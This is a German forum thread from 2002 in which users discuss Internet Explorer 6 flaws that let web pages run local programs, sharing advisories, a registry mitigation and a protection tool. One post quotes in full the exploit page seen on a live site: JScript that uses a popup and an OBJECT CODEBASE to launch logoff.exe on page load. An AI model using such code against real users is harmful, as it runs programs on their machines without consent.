Sicherheitslücke im Internet Explorer 6 SP1

#0
26.02.2002, 14:11
Member
Avatar Tille

Beiträge: 451
#1 Hi

ich habe wirklich langsam das verzweifelte Gefühl Microsoft bekommt das nie gebacken: Es gibt (immer noch) eine sehr grosse Sicherheitslücke im Internet Explorer, die es möglich macht, Programme auf dem Client PC auszuführen.

hier könnt ihr euren Rechner testen:
http://www.planet-xp.de/modules.php?name=News&file=article&sid=513

Tille
__________
Anonymität im Internet ist, wenn Du keinen kennst, aber alle Dich.
Seitenanfang Seitenende
26.02.2002, 19:35
Moderator
Avatar joschi

Beiträge: 6466
#2 Ich frage mich ernsthaft, wieso Leute immer noch auf MS-Produkte
vertrauen und sich immer das Neueste gleich auf die Kiste laden und verwenden müssen.(Ich nehme an ein gut gepatchter IE 5.X ist für das Web völlig ausreichend, oder?!)
Es ist absolut und hinreichend bekannt (!!!), dass jedes neue MS-Produkt
erst mal voller Pannen ist, die u.U sogar den Rechner und die Privatsphäre
gefährden. Man ist ständig am Asschau halten nach neuen Servicepacks, mit denen man dann gewissermaßen stets im Hintertreffen ist.
Bestes Beispiel ist XP.....Wenn ich mir die "Htis" und "Postings" zu XP-Themen anschau.....jede Menge von Leuten haben das Ding auf der Kiste.
Entweder man jammert dann rum über die Spionage-Türchen und Lücken, oder kämpft mit Tools und Teufel gegen die kleinen und grossen "Gemeinheiten" an.
Ein einziger Irrwitz in meinen Augen, .....nun verwende ich selbst Windows
(98 lite und kein IE ;-) )....is bestimmt auch nicht die "Glanzgeburt", aber auf Grund des betagten Alters sind Lücken und Mängel bekannt und man kann gezielter etwas unternehmen und stochert nicht im Nebel.
Meinungen? ;-)
__________
Durchsuchen --> Aussuchen --> Untersuchen
Seitenanfang Seitenende
04.03.2002, 20:35
Member

Themenstarter
Avatar Tille

Beiträge: 451
#3 Hi Joschi,

ich habe eigentlich auch immer die neusten Updates und Servicepacks für meine Microsoft Produkte drauf... - macht eigentlich mehr Sinn, da viele Bugs in den neuen Version schon gefixt sind.
Neue Bugs, die auftauchen funktionieren auch meist in älteren Versionen der Software:

Beispiel:
Heute (04.03.02) von Heise veröffentlichter Bug der nur im IE 5.5 funktioniert
Internet Explorer führt lokale Dateien aus

Gruß
Tille
__________
Anonymität im Internet ist, wenn Du keinen kennst, aber alle Dich.
Dieser Beitrag wurde am 04.03.2002 um 20:35 Uhr von Tille editiert.
Seitenanfang Seitenende
07.03.2002, 19:48
Administrator
Avatar Lukas

Beiträge: 1742
#4 Hi Tille,

wie man sieht wird der Bug auch schon fleissig von Websites ausgenutzt:

Achtung gefährlicher Link:
hxxp://www.turboflux.net/xp_rules.jpg
(Computer fährt herunter)

der Trick bei diesem Link ist, das dort einfach ein Ordner existeriert, der xp_rules.jpg heisst und indem eine index.html Datei mit folgendem Inhalt ist:

Code

##!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"## 
##HTML##
##HEAD##
##TITLE##IE6 security...##/TITLE##

##META http-equiv=Content-Type content="text/html; charset=windows-1252"##
##SCRIPT language=JScript##

var programName=new Array(
'c:/windows/system32/logoff.exe',
'c:/winxp/system32/logoff.exe',
'c:/winnt/system32/logoff.exe'
);

function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n##programName.length;n++)
html+="##OBJECT NAME='X' [color="red"]->[/color]
CLASSID='CLSID:11111111-1111-1111-1111-111111111111' [color="red"]->[/color]
CODEBASE='"+programName[n]+"' %1='r'####/OBJECT##";
oPopBody.innerHTML=html;
oPopup.show(290, 390, 200, 200, document.body);
}

##/SCRIPT##
##/head##
##BODY onload="Init()"##
You should feel lucky if you dont have XP right now.
##/BODY##
##/HTML##


WinXP Rechner werden beim clicken darauf heruntergefahren...

gefahrenlos testen könnt ihr das hier: http://www.heise.de/ct/browsercheck/e5demo10.shtml

mehr Infos um sich zu schützen hier: http://www.golem.de/0203/18595.html

Gruß
Lukas
__________
Gruß Lukas :yo
Dieser Beitrag wurde am 21.03.2002 um 15:58 Uhr von Lukas editiert.
Seitenanfang Seitenende
07.03.2002, 19:55
Administrator
Avatar Lukas

Beiträge: 1742
#5 Übrigens:

Sicherheitslücke in Microsofts Java-Machine (Update) - Golem sowie
Microsoft warnt vor Leck in seiner Virtual Machine - PCWelt

und hier gleich ein » Patch für alle Windows Versionen

i love Opera ;)
__________
Gruß Lukas :yo
Dieser Beitrag wurde am 07.03.2002 um 19:59 Uhr von Lukas editiert.
Seitenanfang Seitenende
13.03.2002, 18:59
~jimbeam
zu Gast
#6 Solange kein Patch verfügbar ist, hilft es folgenden Eintrag in der Registry zu ändern:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
Den Wert bei 1004 (DWORD) von 0 auf 3 ändern.
Seitenanfang Seitenende
13.03.2002, 20:22
Administrator
Avatar Lukas

Beiträge: 1742
#7 hab ich woanders gefunden:

Zitat

Das Problem:
Durch eine Schwachstelle bei der Verarbeitung von dynamisch eingefügten HTML-Fragmenten können arglistige Webseiten oder
HTML-E-Mails beliebige Programme auf dem System des die arglistige Webseite/HTML-E-Mail betrachtenden Benutzers aufrufen. Es wurde nun eine Möglichkeit gefunden, das Aufrufen beliebiger Programme auch ohne den Einsatz von ActiveScripting oder ActiveX zu realisieren. Dadurch stehen derzeit beim Einsatz des Microsoft Internet Explorers, mit Ausnahme von HTTP-Filterprogrammen, keine Schutzmöglichkeiten zur Verfügung. Sollte ferner eine Möglichkeit gefunden werden den Programmaufrufen beliebige Parameter zu übergeben, so könnte dies zu
einer Benutzer-/Systemkompromittierung führen.
Weitere Infos zum Problem:
http://www.network-secure.de/CERT_Schwachstelle_IE_020302.php3
http://security.greymagic.com/adv/gm001-ie/

Schutz-Tool :
http://www.nsclean.com/dsostop.html
Damit lässt sich die Verwundbarkeit an- oder abstellen.


...sollte auf jeden Fall vorläufig helfen ;)
__________
Gruß Lukas :yo
Seitenanfang Seitenende
20.03.2002, 18:16
zu Gast
#8 jooo lukas soviel zu dem "patch opera" der alle Probleme beseitigen soll:
http://www.heise.de/ct/browsercheck/odemo.shtml
Seitenanfang Seitenende
21.03.2002, 15:59
Administrator
Avatar Lukas

Beiträge: 1742
#9 Ops,

ich fühlte mich mit Opera immer sooo sicher, aber ist klar, wenn da was aus Java drin integriert ist:

Die Meldungen über Sicherheitslücken in Java scheinen momentan auch einfach nicht abzureissen: http://www.heise.de/newsticker/data/kav-21.03.02-000/

Gruß Lukas
__________
Gruß Lukas :yo
Seitenanfang Seitenende
21.03.2002, 16:17
Member
Avatar Laserpointa

Beiträge: 2175
#10 Ich eröffne jetzt kein neues Thread, da ich nicht weiss, was an der Meldung dran sein kann:

http://www.lac.co.jp/security/english/snsadv_e/48_e.html

in ihr wir mitgeteilt, das man die Download Funktion des IE deaktivieren sollte, da sonst jede beliebige Datei automatisch heruntergeladen und ausgeführt werden könnte... Das wäre ziemlich schlimm, bei den vielen Dialern im Netz

weiss jemand Details?
Seitenanfang Seitenende
21.03.2002, 16:50
zu Gast
#11 Schwachstelle im Microsoft Internet Explorer 6.0
Gefahrenpotenzial hoch bis sehr hoch
mehr unter:
http://www.astalavista.ch/news/detail.php?ID=394
oder bei rus-cert
http://www.rus-cert.de/ticker/article.php?mid=751
Seitenanfang Seitenende
21.03.2002, 16:56
Member
Avatar Laserpointa

Beiträge: 2175
#12 Hi Jimbeam,

genau daher habe ich das auch und Astalavista hats vom RUS-CERT und RUS-CERT verweisst auf http://www.lac.co.jp/security/english/snsadv_e/48_e.html

wie und ob diese Sicherheitslücke jedoch wirklich nachweisbar existiert, kann ich noch nicht genau sagen...

Greetz
Seitenanfang Seitenende
21.03.2002, 17:46
zu Gast
#13 ups, yep, eigentlich logisch, ich hab nicht darauf geachtet. Hm das Prob besteht aber nicht erst seit gestern.
Schau unter http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0727, dort sind einige info-Quellen zu finden
Seitenanfang Seitenende
21.03.2002, 22:04
Administrator
Avatar Lukas

Beiträge: 1742
#14 Hi ihr beiden:

an dieser Sache ist was dran:
http://www.securitytracker.com/alerts/2002/Mar/1003839.html

Microsoft selbst bestätigt es, jedoch habe ich noch nicht herausfinden können, wie diese Sicherheitslücke genau funktioniert!

Schützen kann man sich davor wie schon beschrieben, indem man die Download Optionen deaktiviert...

Lukas
__________
Gruß Lukas :yo
Seitenanfang Seitenende
27.05.2002, 19:48
zu Gast
#15 Also ich weiss wie das geht. Ist ganz einfach.

AIM: tmcotaku
Seitenanfang Seitenende
Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!

Folgende Themen könnten Dich auch interessieren:
  • »
  • »
  • » Anleitung:
  • »
  • »